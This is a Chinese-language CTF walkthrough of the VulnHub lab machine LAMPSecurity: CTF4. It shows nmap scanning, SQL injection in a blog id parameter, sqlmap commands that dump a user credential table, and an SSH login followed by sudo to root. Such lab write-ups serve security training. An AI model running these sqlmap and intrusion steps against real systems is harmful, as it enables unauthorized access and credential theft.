vulnhub-LAMPSecurity：CTF4

本次使用靶机名为LAMPSECURITY: CTF4的ctf挑战。我们的目标是获取该靶机root shell

下载链接：https://www.vulnhub.com/entry/lampsecurity-ctf4,83/

难度：简单

网络扫描

首先要获取目标IP进行确定

netdiscover -i eth0 -r 192.168.0.0/24

可以看到我们找到了该靶机->192.168.0.101

NMAP搜集信息

接下来通过nmap扫描网络以查找开放的端口和服务。

nmap -sV-A -p- -oN /CTF/vulnhub/ctf/nmap 192.168.0.101

结果显示打开了22(ssh),25(smtp),80(http)端口。

22端口上并无任何有价值发现 接下来把目光放到80端口上 浏览器导航到URL http://192.168.0.101 我们看到了欢迎页面

通常在浏览这种http服务时，我经常做的一件事就是检查文件中是否有任何兴趣的内容 robots.txt

User-agent: * Disallow: /mail/ Disallow: /restricted/ Disallow: /conf/ Disallow: /sql/ Disallow: /admin/

当我浏览到/sql/下带有db.sql文件的目录索引时，发现了有一个SQL数据库。回到首页我们按顺序点击导航选项卡查找有可能存在sql注入的点，在我们点击blog后 

在这里怀疑是注入点，我们只要在id参数后加上引号后就可以测试是否为注入点。

然后弹出了SQL错误：Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20

废话不多说 直接sqlmap一把梭。

sqlmap -u "http://192.168.0.101/index.html?page=blog&title=Blog&id=2" --dbs --batch

完成SQLMAP扫描后 我们得到了所有数据库的表 接下来我们尝试使用ehks数据库，使用以下命令提取其他详细信息。

sqlmap -u "http://192.168.0.101/index.html?page=blog&title=Blog&id=2" -D ehks --tabels --batch

看到ehks数据库内有三个表 我们继续对user表内进行提取。

sqlmap -u "http://192.168.0.101/index.html?page=blog&title=Blog&id=2" -D ehks -T user --dump --batch

从上面的截图中可以看到，我们得到了 ehks数据库用户表的所有用户及其对应凭证的列表。

那我们现在进一步尝试通过SSH登录机器。

ssh dstevens@192.168.0.101sudo -lsudo su

在执行 sudo -l时 我们看到用户 dstevens没有设置任何限制，并且有权使用sudo运行所有命令。

此刻 我们获得了root访问权限。

点击下方公众号获取更多内容

原文始发于微信公众号（剑客江湖）：vulnhub-LAMPSecurity：CTF4